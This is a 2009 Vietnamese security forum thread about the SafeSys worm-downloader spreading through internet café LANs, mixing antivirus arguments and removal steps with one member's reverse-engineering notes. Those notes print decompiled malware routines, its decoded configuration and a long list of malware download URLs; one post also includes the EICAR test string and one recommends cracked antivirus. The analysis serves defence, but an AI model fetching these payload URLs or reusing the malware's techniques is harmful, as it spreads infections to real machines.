English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN  XML
Go to Page:  First Page Page 1 Page 3 Last Page
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 17/03/2009 02:08:50 (+0700) | #31 | 173387
Heaven Knows
Member
[Minus]    0    [Plus]
Joined: 11/03/2009 17:16:20
Messages: 15
Offline
[Profile] [PM]
có 1 command line để ghi lại master boot record "fdisk /mbr" tôi nghĩ command line này sẽ fix được lỗi khi virus attack vào MBR làm cho việc cài lại máy hay sử dụng deep freeze vẫn bị dính
[Up] [Print Copy]
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 17/03/2009 02:34:16 (+0700) | #32 | 173392
[Avatar]
 haley
Member
[Minus]    0    [Plus]
Joined: 03/02/2009 17:20:16
Messages: 58
Offline
[Profile] [PM]
bạn thủ dùng KAV xem. mình dùng kái này thấy yên tâm lám. vì nó chưa cjiuj pó tay với kon vrs nào cả! search trên gôgle hoặc vào tech24.vn thử xem!
[Up] [Print Copy]
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 17/03/2009 03:18:41 (+0700) | #33 | 173399
[Avatar]
 bolzano_1989
Journalist
[Minus]    0    [Plus]
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
[Profile] [PM]

haley wrote:
bạn thủ dùng KAV xem. mình dùng kái này thấy yên tâm lám. vì nó chưa cjiuj pó tay với kon vrs nào cả! search trên gôgle hoặc vào tech24.vn thử xem! 

Bạn này spam khắp nơi quảng cáo cho KAV kinh quá smilie . Dù gì mình cũng khuyên dùng KAV .
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 17/03/2009 09:51:43 (+0700) | #34 | 173470
TQN
Elite Member
[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Cái này thì đúng, tui dùng KAV, chả thấy mặt mũi con SafeSys đâu cả.
[Up] [Print Copy]
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 17/03/2009 10:08:36 (+0700) | #35 | 173476
[Avatar]
 gsmth
Elite Member
[Minus]    0    [Plus]
Joined: 15/02/2007 13:25:36
Messages: 749
Offline
[Profile] [PM] [WWW] [Yahoo!]

TQN wrote:
Cái này thì đúng, tui dùng KAV, chả thấy mặt mũi con SafeSys đâu cả. 


TQN có ra quán net bao giờ k?

Ra quán nét xem tụi nó cài KAV diệt con SafeSys thì KAV nó làm gì với máy đó nhé smilie

Thôi nói luôn, KAV chả làm được gì!
[Up] [Print Copy]
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 17/03/2009 10:09:01 (+0700) | #36 | 173477
Enternal
Member
[Minus]    0    [Plus]
Joined: 15/03/2009 23:16:06
Messages: 2
Offline
[Profile] [PM] [Email] [Yahoo!]
Hix.Máy tớ đang có kav 7 nhưng hình như nó ko ngăn chặn lũ kia.Chán quá
[Up] [Print Copy]
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 17/03/2009 10:18:19 (+0700) | #37 | 173480
TQN
Elite Member
[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Vậy à, tui không biết. Tui chỉ down con SafeSys trên VirusVN về thì bị KAV chụp. Disable nó, unpack WinUpack ra, thấy KAV không la làng nữa. Debug và RE nó, down = tay máy con .exe phụ mà SafeSys sẽ down về, cũng bị KAV tóm luôn.
Extract cái file killer.sys mà SafeSys nhúng trong nó, cũng bị KAV tóm luôn. Lại phải disable mới RE & debug được.
Vậy tạo sao nói KAV không trị SafeSys và đám con của nó được vậy ta ?
Con virus này code = Delphi 7, chắc của tụi TQ. Main project file của nó có tên là SiNiu.dpr, tức exe lúc build là SiNiu.exe, dùng các unit sau:
1. WinSock, System, SysInit, Windows, Types, WinInet, WinSvc, ShellAPI, Messages, TlHelp32: các standard unit của Borland Delphi.
2. Các unit 3rd party: Unit_SpoolsvKiller, IoCtrl, ApplicationUnit, WinVerUtilsm, Unit_DllFile, SysUtils2, SysutilsLite, Unit_MyLove, Unit_FwAvName, NetIPC, SendMail.
Các bạn để ý tới 4 unit quan trong thực hiện các tính năng của nó:
- Unit_SpoolsvKiller: inject spoolsv.exe
- Unit_FwAvName: detect và tắt các AV
- NetIPC: giao tiếp với các máy trong mạng Lan để lây lan.
- SendMail: tui chưa RE tới đây, xem con nó mail cái "khỉ mốc" gì, đi đâu.
[Up] [Print Copy]
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 17/03/2009 11:22:05 (+0700) | #38 | 173489
TQN
Elite Member
[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Vì con này code = Delphi, nên RE nó đơn giản, có điều code sau khi RE nó ra "hơi bị lớn", nên tui không thể post hết lên ở đây được. Tui chỉ trình bày 3 hàm đầu tiên bắt đầu của nó. Còn viết hết ra thành 1 article thì tui không thể, lười lắm, hiện tại nó chỉ nằm lộn xộn trong cái đầu già của tui.
Đầu tiên, con virus này dùng 2 đoạn obfuscated code để ngăn chặn các AV quét theo EP. Hai đoạn này nhảy tới, nhảy lui lung tung, không làm gì cả. Tui sẽ trình bày luôn code Delphi của nó.
Kế tiếp, virus gọi 1 hàm đặc biệt để kiểm tra nó được phép lây lan trên máy này không. Nó sẽ create 1 file có tên là "?*-?". Nếu có file này, nó sẽ thoát.
Code:
function CheckSpecialFile: Boolean;
var
  hFile: HANDLE;
begin
  hFile := CreateFile('?*-?', GENERIC_READ or GENERIC_WRITE, FILE_SHARE_READ or FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, NORMAL, NULL);
  CloseHandle(hFile);
  Result :=  hFile <> INVALID_HANDLE_VALUE;
end;
....
.code:0040E3D0 3A4         call    CreateSpecialFile
.code:0040E3D5 3A4         test    al, al
.code:0040E3D7 3A4         jnz     short Exit
....
.code:0040E3E3     Exit:                                       ; CODE XREF: start+3Bj
.code:0040E3E3 3A4         push    0                       ; uExitCode
.code:0040E3E5 3A8         call    ExitProcess_0

File này các bạn không thể tự tạo được, nó liên quan tới killer.sys. Killer.sys phục vụ các thao tác disk IO cho virus, và return TRUE khi được lệnh Create File với name như trên.

Tiếp đó, virus sẽ dùng ToolHelp32 API để lấy parent process ID của nó, nếu là 4, tức System process, thì nó sẽ thoát. Tui chưa debug và RE hết tới trường hợp làm sao nó run ở con của System process được.
Code:
function GetParentProcessID: DWORD;
var
  pEntry: PROCESSENTRY32;
  hSnapshot: HANDLE;
  dwRet: DWORD;
begin
  hSnapshot :=  CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  pEntry.dwSize := SizeOf(PROCESSENTRY32);
  dwRet := Process32First(hSnapshot, @pEntry);
  while (dwRet <> 0)
  begin
     if (GetCurrentProcessId == pEntry.th32ProcessID) then
        Result := pEntry.th32ParentProcessID;
     dwRet := Process32Next(hSnapshot, @pEntry);
  end;
end;

Các bạn cũng thấy coder của con virus này đã không tối ưu code của mình khi không đưa GetCurrentProcessId ra ngoài vòng loop và đã không Break ngay khi tìm được parent process id. Tay này cũng không phải là guru về Delphi.
Code ASM của thủ tục trên để chứng minh:
Code:
.code:0040D0A4     GetParentProcessID proc near            ; CODE XREF: start+3Dp
.code:0040D0A4 000         push    ebx
.code:0040D0A5 004         push    esi
.code:0040D0A6 008         push    edi
.code:0040D0A7 00C         add     esp, -128h
.code:0040D0AD 134         mov     edi, esp
.code:0040D0AF 134         xor     esi, esi
.code:0040D0B1 134         xor     edx, edx
.code:0040D0B3 134         mov     eax, TH32CS_SNAPPROCESS
.code:0040D0B8 134         call    CreateToolhelp32Snapshot ; Delphi 7 RTL
.code:0040D0B8
.code:0040D0BD 134         mov     ebx, eax
.code:0040D0BF 134         mov     [edi+PROCESSENTRY32.dwSize], 128h
.code:0040D0C5 134         mov     edx, edi
.code:0040D0C7 134         mov     eax, ebx
.code:0040D0C9 134         call    Process32First          ; Delphi 7 RTL
.code:0040D0C9
.code:0040D0CE 134         jmp     short IsEndLoop
.code:0040D0CE
.code:0040D0D0     ; ---------------------------------------------------------------------------
.code:0040D0D0
.code:0040D0D0     Loop:                                   ; CODE XREF: GetParentProcessID+44j
.code:0040D0D0 134         call    GetCurrentProcessId
.code:0040D0D0
.code:0040D0D5 134         cmp     eax, [edi+PROCESSENTRY32.th32ProcessID]
.code:0040D0D8 134         jnz     short NextProcess
.code:0040D0D8
.code:0040D0DA 134         mov     esi, [edi+PROCESSENTRY32.th32ParentProcessID]
.code:0040D0DA
.code:0040D0DD
.code:0040D0DD     NextProcess:                            ; CODE XREF: GetParentProcessID+34j
.code:0040D0DD 134         mov     edx, edi
.code:0040D0DF 134         mov     eax, ebx
.code:0040D0E1 134         call    Process32Next           ; Delphi 7 RTL
.code:0040D0E1
.code:0040D0E6
.code:0040D0E6     IsEndLoop:                              ; CODE XREF: GetParentProcessID+2Aj
.code:0040D0E6 134         test    eax, eax
.code:0040D0E8 134         jnz     short Loop
.code:0040D0E8
.code:0040D0EA 134         push    ebx                     ; hObject
.code:0040D0EB 138         call    CloseHandle_0
.code:0040D0EB
.code:0040D0F0 134         mov     eax, esi
.code:0040D0F2 134         add     esp, 128h
.code:0040D0F8 00C         pop     edi
.code:0040D0F9 008         pop     esi
.code:0040D0FA 004         pop     ebx
.code:0040D0FB 000         retn
.code:0040D0FB
.code:0040D0FB     GetParentProcessID endp
[Up] [Print Copy]
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 17/03/2009 11:34:23 (+0700) | #39 | 173492
TQN
Elite Member
[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Sau khi gọi hàm GetParentProcesID, virus sẽ check parent PID với 4 và thoát nếu =:
Code:
.code:0040E3D9 3A4         call    GetParentProcessID
.code:0040E3D9
.code:0040E3DE 3A4         cmp     eax, 4                  ; Is system process ?
.code:0040E3E1 3A4         jnz     short loc_40E3EA
.code:0040E3E1
.code:0040E3E3
.code:0040E3E3     Exit:                                   ; CODE XREF: start+3Bj
.code:0040E3E3 3A4         push    0                       ; uExitCode
.code:0040E3E5 3A8         call    ExitProcess_0

Sau đó, virus rút các thông tin quy định cách thức hoạt động và địa chỉ download đống virus con về máy victim từ resource type "CONFIG", item "SETTINGS", decode nó ra thành 1 string dài đằng đặc. Tui post lên cho các bạn tham khảo luôn:
Code:
DownURL=http://ok.wyt369.com/count.txt
ExeFile=%ProgramFiles%\Common Files\SafeSys.exe
FixedTime=30
DelayTime=10
SleepTime=5
bDel=1
bHidden=0
bDriver=1
bSaftBoot=0
bKeyWord=1
bIFEO=1
bAutoRun=1
bKillAV=1
bTaskMgr=0
bHideProcess=0
bIPCInfect=1
bCloseUpdate=0
bLockPage=1
StartPageURL=
StatCountURL=http://count.key5188.com/count/Count.asp
PopURL=
PopURLType=0
PopURLTime=0
PopURLClose=0
ServerVer=20090301

Cá bạn để ý đến cái DownURL, đây chính là địa chỉ mà virus sẽ dùng WinINet API để download ngẫu nhiên 1 con virus con khác về máy. Cách đây máy ngày thì tui còn thấy ở đầu tiên là ok1.exe, nhưng tới thời điểm tui post bài này, nó đã sinh ra 1 đống khác. Vậy đừng trách KAV diệt không hết nhé, update có kịp với thằng virus coder trời đánh này đâu.
Code:
http://u8.1369zz.com/sb/yg.exe
 http://u8.1369zz.com/la/fm.exe
 http://u8.1369zz.com/la/L1.exe
 http://u8.1369zz.com/la/L3.exe
 http://u8.1369zz.com/la/L4.exe
 http://u9.1369zz.com/cj/1a.exe
 http://u2.1369zz.com/gz/G3.exe
 http://u2.1369zz.com/gz/G8.exe
 http://u2.1369zz.com/gz/G10.exe
 http://u2.1369zz.com/gz/G1.exe
 http://u2.1369zz.com/gz/G11.exe
 http://u2.1369zz.com/gz/G15.exe
 http://u2.1369zz.com/gz/G4.exe
 http://u2.1369zz.com/gz/G31.exe
 http://u2.1369zz.com/gz/G2.exe
 http://u2.1369zz.com/gz/G12.exe
 http://u2.1369zz.com/gz/G32.exe
 http://u2.1369zz.com/gz/G14.exe
 http://u2.1369zz.com/gz/G7.exe
 http://u2.1369zz.com/gz/G9.exe
 http://u8.1369zz.com/la/L17.exe
 http://u8.1369zz.com/la/L6.exe
 http://u8.1369zz.com/la/L9.exe
 http://u8.1369zz.com/la/L5.exe
 http://u8.1369zz.com/la/L8.exe
 http://u2.1369zz.com/lm/S10.exe
 http://u2.1369zz.com/lm/S8.exe
 http://u2.1369zz.com/lm/S1.exe
 http://u2.1369zz.com/lm/S15.exe
 http://u2.1369zz.com/lm/S18.exe
 http://u2.1369zz.com/lm/S5.exe
 http://u2.1369zz.com/lm/S19.exe
 http://u2.1369zz.com/lm/S14.exe
 http://u2.1369zz.com/lm/S20.exe
 http://u2.1369zz.com/lm/S13.exe
 http://u9.1369zz.com/cj/a6.exe
 http://u9.1369zz.com/cj/a2.exe
 http://u9.1369zz.com/cj/a4.exe
 http://u7.1369zz.com/cj/a8.exe
 http://u9.1369zz.com/cj/a1.exe
 http://u9.1369zz.com/cj/a10.exe
 http://u9.1369zz.com/cj/a9.exe


Đọc tới đây, các bạn ở quán net có thể thấy ngay 1 cách để ngăn chặn SafeSys lây lan là cấm không cho down từ các ông nội: http://u9.1369zz.com/, http://ok.wyt369.com/. Tui dùn FireFox download thử 1 con trong đống trên thì bị FireFox block ngay: Reported Attack Site!. Nhưng các bạn nhớ cho là tầng API vẫn down được nhé. Dùng FlashGet trên máy tui vẫn down được, nhưng KAV nhảy xô ra chụp liền.

Phân tích virus này ra phải cả chục trang, nó dùng rất nhiều kỹ thuật, nhưng thông dụng, mà các virus coder thường dùng. Chỉ khá hơn các con khác ở killer.sys, bypass Deep Phờ ri... Chứ các cái khác thì "phình phường". Tui nghĩ con này và đám con của nó do 1 tool made virus của tụi TQ tạo ra thôi.

Tạm dừng tại đây, mới trình bày kết quả RE của 3 lệnh call đầu của main .dpr đã gõ mỏi tay rồi. Chắc em xin thua luôn vụ viết 1 article hoàn chỉnh về con SafeSys này. Tiếng Anh của em bây giờ lại giống em bé mới tập nói mới chết chứ.
[Up] [Print Copy]
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 17/03/2009 19:54:42 (+0700) | #40 | 173529
[Avatar]
 gsmth
Elite Member
[Minus]    0    [Plus]
Joined: 15/02/2007 13:25:36
Messages: 749
Offline
[Profile] [PM] [WWW] [Yahoo!]
Đúng là đây chỉ là con Downloader bình thường cõng thêm worm, trojan, rootkit, ghi đè file chuẩn (PE virus). RE nó cũng không phức tạp j.

Vấn đề là tất cả các CON trên máy bị nhiễm tớ chứng kiến thì là con KAV đã cập nhật. Con đó chưa tải gì mới về máy tính của nó, vì thằng quán net nó cũng thông minh rút dây mạng ra smilie)

Tình trạng trên máy đó sau khi cài KAV là máy bị dump, kd lại dump tiếp.. Tớ cũng k hiểu với con Downloader bình thường này mà KAV không làm gì được. Tò mò ngó mấy file dump thì thấy lý do là do driver của KAV (kl*.sys). Gửi sample + dump file cho bọn KAV cả tuần nay mà k thấy hồi âm gì hết trơn. Không biết có phải do tiếng Anh của tớ tệ lắm không loll.

Theo tớ suy đoán thì KAV không diệt được là do không đặt nó vào cùng hoàn cảnh với thằng quán net kia. Vấn đề này nghe dễ nhưng làm được cũng khó phết đấy.



[Up] [Print Copy]
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 17/03/2009 20:45:50 (+0700) | #41 | 173530
Nowhereman
Elite Member
[Minus]    0    [Plus]
Joined: 19/11/2003 06:25:42
Messages: 108
Offline
[Profile] [PM] [Email]


@all : tớ khuyên các bác một câu chân thành nhé. đừng bao giờ tin và dùng thằng Bkav . tớ không hiểu tại sao đến jo'\ này các bác vẫn sài trình diệt vi rút kém nhất là BKAV .

>>>> Lên thử Google.com search với từ khóa antivirus program xem có cả núi. toàn thằng có tên tuổi oài .

->> rồi đừng nói là không có nổi một vài bản copy của những trình diệt virus nổi tiếng như Symantech, CA, AVG ,MaCafee, Deepfre..., .v.v. để sài nhé. đằng sau những trương trình đó là cả một đội ngũ cao thủ ngày đêm săn lùng, tìm diệt virus mới, cho các bồ tha hồ yên tâm quậy fa'. TRUST ME .

chúc rui.


lang thang vẫn mãi không nhà
đôi chân lê bước thê lương tháng ngày
càng đi càng thấy đắm say
tình thương con Chúa lòng này chẳng phai
thời gian cứ mãi miệt mài
lang thang đi tiếp ....rồi bay lên z ời
cúi đầu con lạy Ông Trời
xin thươn
[Up] [Print Copy]
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 17/03/2009 22:04:05 (+0700) | #42 | 173533
beatboxvn
Member
[Minus]    0    [Plus]
Joined: 24/06/2008 22:43:46
Messages: 14
Offline
[Profile] [PM]
Tình cờ vô diễn đàn của Kas, có bài hướng dẫn diệt con này, mọi người tham khảo: http://forum.kaspersky.vn/showthread.php?t=5602

Hơi bực chút là hướng dẫn này sử dụng BKAV. Nhưng thôi, dù sao các bạn tiệm Net cứ thử coi.

Trong trường hợp mọi người lười click, có thể đọc luôn ở đây:

Diễn đàn Kas wrote:
Các bạn thân mến, sau một thời gian chờ đợi mệt mỏi và lo âu, cuối cùng bác Quảng hói nhà ta đã không làm phụ lòng người Việt (tôn vinh sản phẩm Việt).
Bản BKAV Home 2171 đã diệt được virus safesys trên máy bị nhiễm, tuy chưa hoàn hảo nhưng thế này cũng đã tạm chấp nhận được. Đây đúng là một tin vui cho các chủ tiệm Net và các bạn kĩ thuật viên làm công tác bảo trì phòng Net. Từ nay các bạn có thể ngủ yên giấc rồi, ko phải thức khuya hoặc giật mình vì lo lắng nữa.

Nhưng với bản này trong tay, các bạn diệt theo cách bình thường tải về và quét thì bảo đảm BKAV sẽ bị virus ăn mất.

Dưới đây mình sẽ trình bày về cách diệt virus safesys.exe này với BKAV, các bạn xem và thử nhé (mình đã làm 100% thành công)

1. Trước tiên trên máy nhiễm, bạn chép file BHome2171.exe vào ổ D (đừng chạy nó)
2. Rút dây mạng.
3. Boot bằng đĩa Hirent - vào DOS --> gõ lệnh fdisk/mbr để (clear master bootrecord) hay nói cách khác là làm lại bootsector
4. Khởi động lại máy --> ấn F8 để vào safemod của Windows
5. Vào Start Run --> gõ D:\BHome2171.exe --> chờ đến khi màn hình BKAV xuất hiện báo cài đặt thành công bạn chuyển sang bước 6.
6. Vào Taskmanager --> End Process Explorer.
7. Quét virus trên tất cả các ổ, tất cả các file, diệt ko cần hỏi.
8. Sau khi quét xong vẫn để nguyên màn hình BKAV, ấn tổ hợp phím CTR+ALT+DEL, để vào Taskmanager một lần nữa --> vào File --> New Task(Run) --> gõ Explorer.exe
9. Lại quét virus với BKAV một lần nữa.
10. Quét xong, khởi động lại máy vào chế độ win bình thường, tiếp tục quét thêm một lần nữa. (Khi quét ở safemod xong chế độ Security của Windows sẽ được BKAVHome phục hồi về trạng thái ban đầu) bạn cứ để nguyên trạng ở đó --> Chờ nó quét xong --> lúc đó mới tắt những chế độ update, firewall, ...
11. Khởi động lại máy ==> Chúc mừng bạn, xong rồi đó.

Kiểm tra thì vẫn thấy trong thư mục C:\Windows\system32\ vẫn có một số file lạ nhưng về căn bản thì BKAVHome đã diệt tốt virus Safesys.exe.
Anh em phòng Net và kĩ thuật viên xin hãy cổ vũ, động viên tinh thần cho bác Quảng cùng anh chị em làm ở trung tâm BKIS để họ sớm diệt tận gốc và luôn sát cánh với anh em diệt mọi biến thể của virus safesys.exe này.
 
[Up] [Print Copy]
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 18/03/2009 01:33:58 (+0700) | #43 | 173561
TQN
Elite Member
[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Con virus này có một cửa hậu mà tác giả code vào chắc để test.
Máy bạn nào bị đang bị nhiểm thử gọi file SafeSys.exe trong Program Files\Common với thông số -Clear rồi kill, del bình thường thử xem sao ?
[Up] [Print Copy]
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 02/04/2009 01:47:39 (+0700) | #44 | 175682
Nowhereman
Elite Member
[Minus]    0    [Plus]
Joined: 19/11/2003 06:25:42
Messages: 108
Offline
[Profile] [PM] [Email]
sài Bkav có ngày bị theo dõi cũng nên ( vì nhiều lý do mà . ví dụ nhé lý do theo dõi khách hàng và update từ xa ( remote install and update ), ly do qản lý users "HỘ" các ISP và PC15 chẳng hạn xem ku nào nghịch zi\ ke ke ke ) tóm lại tớ vẫn khuyên KHÔNG NÊN SÀI BKAV trong mọi trường hợp. thêm nữa là công nghệ tìm diệt chuyên đi SAU và NHÁI lại theo công nghệ cao thủ của nước ngoài . Tớ ví dụ luôn giống như họ đang hô hào sự lên đời qua bài " Những tiết lộ đầu tiên về Bkav 2009 http://www.bkav.com.vn/tieu_diem/17/02/2009/8/2139/ <<< " trong này có nói đến tìm diệt theo kiểu " Công nghệ nhận diện virus thông minh (Heuristic), công nghệ quét thông minh (Smart Scan) và công nghệ tự bảo vệ trước tấn công (Sefl Defense) sẽ được đưa vào sử dụng. Ngoài ra, các tính năng nâng cao cũng được áp dụng như: Quick Scan (quét nhanh) Full scan (quét toàn bộ hệ thống), Deep scan (quét sâu)… " <<<< ke ke ke

Chúa ơi . các bác biết không tất cả những CÔNG NGHỆ mà BKAV "tiết lộ " SẼ CÓ smilie trong Bkav 2009 thì đã được nhiều hãng và nhiều trình diệt virus tiếng tăm đưa ra ứng dụng từ những năm 2003 và họ ngày càng hoàn thiện sau 6 năm nay rồi thì bác Bkav mới biết nhái nhái lại tí để dọa ma thiên hạ .

ở đây tớ lấy ví dụ về eTrust Antivirus của CA . -->> chỉ với 10 - 15 ngàn đồng việt nam các bác có thể mua ở các tiệm bán đĩa PC /software bản crack mới nhất của gần hết các trình diệt virust tuyệt vời và Spy , warm wares nữa chứ ??? ôh . các bác cứ mua về sài và kiểm chứng những gì tớ nói đi. hoặc lên Google mà search về những công nghệ đó.

Finally . Suy nghĩ cho kỹ trước khi sài BKAV và đồng thời muốn trở thành một Netter smilie . thêm tí nữa là . THÔNG THƯỜNG là không bao giờ cha đẻ ra công nghệ cao và các ứng dụng rộng rãi ( Microsoft , IBM, Sun...) lại không HIỂU bằng, và không có những sản phẩm tìm diệt vi rút TỐT hơn BKav. và đương nhiên Bkis không là ngoại lệ .


một vài í ciến.



lang thang vẫn mãi không nhà
đôi chân lê bước thê lương tháng ngày
càng đi càng thấy đắm say
tình thương con Chúa lòng này chẳng phai
thời gian cứ mãi miệt mài
lang thang đi tiếp ....rồi bay lên z ời
cúi đầu con lạy Ông Trời
xin thươn
[Up] [Print Copy]
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 09/04/2009 05:37:49 (+0700) | #45 | 176267
[Avatar]
 angel_of_devil
Member
[Minus]    0    [Plus]
Joined: 23/10/2004 14:57:09
Messages: 154
Offline
[Profile] [PM]
@Nowhere: Elite member mà phát biểu rất NGỜ U, tôi chả bênh thằng BKAV nhưng tôi nói thật là nó là một trong những công cụ hữu ích để tôi xử lý sự cố máy tính liên quan đến virus. Lý do:
- cài nhanh, nhẹ
- cập nhật virus nội và virus Tàu nhanh hơn các AV ngoại
- gần như ko bị bug khi scan trong safe mode
Thanh niên VN giờ toàn anh tài, chả hiểu làm đc phần mềm diệt virus nào cho nước nhà như cái BKAV chưa mà mở mồm ra là chê bôi, dè bỉu. Thấy người ta hô hay cũng kêu hay, hô dở cũng kêu dở. Thằng cha Quảng quăng bom thì kệ cha lão ý. Khối thằng muốn làm đc như lão ý để có cái mà nói, mà quăng bom cũng có đc đek đâu.
Ngoảnh nhìn lại cuộc đời như giấc mộng
Được mất bại thành bỗng chốc hoá hư không
[Up] [Print Copy]
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 09/04/2009 06:40:00 (+0700) | #46 | 176275
Nowhereman
Elite Member
[Minus]    0    [Plus]
Joined: 19/11/2003 06:25:42
Messages: 108
Offline
[Profile] [PM] [Email]

angel_of_devil wrote:
@Nowhere: Elite member mà phát biểu rất NGỜ U, tôi chả bênh thằng BKAV nhưng tôi nói thật là nó là một trong những công cụ hữu ích để tôi xử lý sự cố máy tính liên quan đến virus. Lý do:
- cài nhanh, nhẹ
- cập nhật virus nội và virus Tàu nhanh hơn các AV ngoại
- gần như ko bị bug khi scan trong safe mode
Thanh niên VN giờ toàn anh tài, chả hiểu làm đc phần mềm diệt virus nào cho nước nhà như cái BKAV chưa mà mở mồm ra là chê bôi, dè bỉu. Thấy người ta hô hay cũng kêu hay, hô dở cũng kêu dở. Thằng cha Quảng quăng bom thì kệ cha lão ý. Khối thằng muốn làm đc như lão ý để có cái mà nói, mà quăng bom cũng có đc đek đâu. 


to : angel_of_devil .

a) bạn NGỜ tớ chuyện gì vậy ?

b) trong hai phần tớ post ở trên có câu nào có chữ " QUẢNG " hay không ? có câu nào đề cập đến " Thằng cha Quảng quăng bom ... " gì gì đó của bạn nói không ??

c) còn ý kiến của bạn về BKAV là " cài nhanh nhẹ, cập nhật virus nội và virus Tau nhanh hơn các AV ngoại " thì xin để cho thiên hạ hiểu, còn tớ vẫn khuyên bạn là bạn nên tìm hiểu thêm về vấn đề virus TÀU virus Nội rồi quăng bom ke ke ke gì gì đó rồi hãy phát biểu . không mọi người sẽ kười chê thì sao nhỉ .

d) không phải tất cả những người hiểu về IT đều cần phải viết được phần mềm diệt virus . cũng giống như vậy không phải tất cả các phần mềm diệt virus đều xuất sắc. ví dụ như BKAV chẳng hạn ke ke ke .

e ) những gì tớ chia sẽ là rút ra từ khinh nghiệm sài các sản phẩm diệt khác nhau , qua thời gian và tớ có ý kiến đó chứ chẳng phải phát biểu linh tinh lang tang như bạn angel_of_devil đâu .

f) thêm tí này nhé X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR copy đoạn code này vào file text rồi save lại với cái tên là linhtinh.com rồi chạy thử xem nó là virus TÀU hay NỘI bạn angel_of_devil nhé . rùi cho tớ biết luôn cái hì hì .

g) thôi dù sao thì dù, cũng xin được cầu chúc bạn bình an nơi tình yêu thương của Chúa. xin bỏ qua cho mình nếu làm bạn giận nha. lần sau đừng phát biểu liều lĩnh nữa.





chúc bình an.

[Up] [Print Copy]
  [Question]   Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 09/04/2009 07:50:44 (+0700) | #47 | 176281
[Avatar]
 tieuvuong_net
Member
[Minus]    0    [Plus]
Joined: 10/04/2004 19:48:33
Messages: 105
Location: The Dark
Offline
[Profile] [PM]

napoleon_tq wrote:
Chào các bạn, dạo này mình gặp rất nhiều khách hàng là Đại lý Internet gặp một loại virut rất khó điều trị, mình chụp đựoc mấy cái hình như sau:
...
Vậy xin hỏi có bạn nào biết về con này không và cách chế ngự thế nào ?

 


Em cũng có gặp và cũng đã xử loại này rất êm, việc đầu tiên nên làm đối với máy bị nhiễm là ngắt kết nối mạng smilie
[Up] [Print Copy]
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 10/04/2009 00:34:27 (+0700) | #48 | 176368
[Avatar]
 angel_of_devil
Member
[Minus]    0    [Plus]
Joined: 23/10/2004 14:57:09
Messages: 154
Offline
[Profile] [PM]
@Nowhere: tự đọc lại những bài viết ở trên xem ai là người nói linh tinh, võ đoán. Tôi chả việc đek j phải giận dỗi j ở đây cả. Đúng là bụng ta suy bụng người. Đời lắm thằng dở người thật smilie)
Ngoảnh nhìn lại cuộc đời như giấc mộng
Được mất bại thành bỗng chốc hoá hư không
[Up] [Print Copy]
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 10/04/2009 02:07:15 (+0700) | #49 | 176381
Nowhereman
Elite Member
[Minus]    0    [Plus]
Joined: 19/11/2003 06:25:42
Messages: 108
Offline
[Profile] [PM] [Email]

angel_of_devil wrote:
@Nowhere: tự đọc lại những bài viết ở trên xem ai là người nói linh tinh, võ đoán. Tôi chả việc đek j phải giận dỗi j ở đây cả. Đúng là bụng ta suy bụng người. Đời lắm thằng dở người thật smilie


to: angel_of_devil



-> lại nói linh tinh và bậy bạ rồi. ấy có vẻ như là tức tối lắm thì phải . bình tĩnh đi nào . tự đọc lại mấy dòng "thông thái" của chính ấy đi rồi hãy cho người khác là dở hơi và thằng này thằng nọ... tớ xin ấy đấy đừng bình loạn linh tinh nữa . chúng ta hãy cùng nói về vấn đề liên quan tới VIRUS cho đúng nội quy nha. ke ke ke.




lang thang vẫn mãi không nhà
đôi chân lê bước thê lương tháng ngày
càng đi càng thấy đắm say
tình thương con Chúa lòng này chẳng phai
thời gian cứ mãi miệt mài
lang thang đi tiếp ....rồi bay lên z ời
cúi đầu con lạy Ông Trời
xin thươn
[Up] [Print Copy]
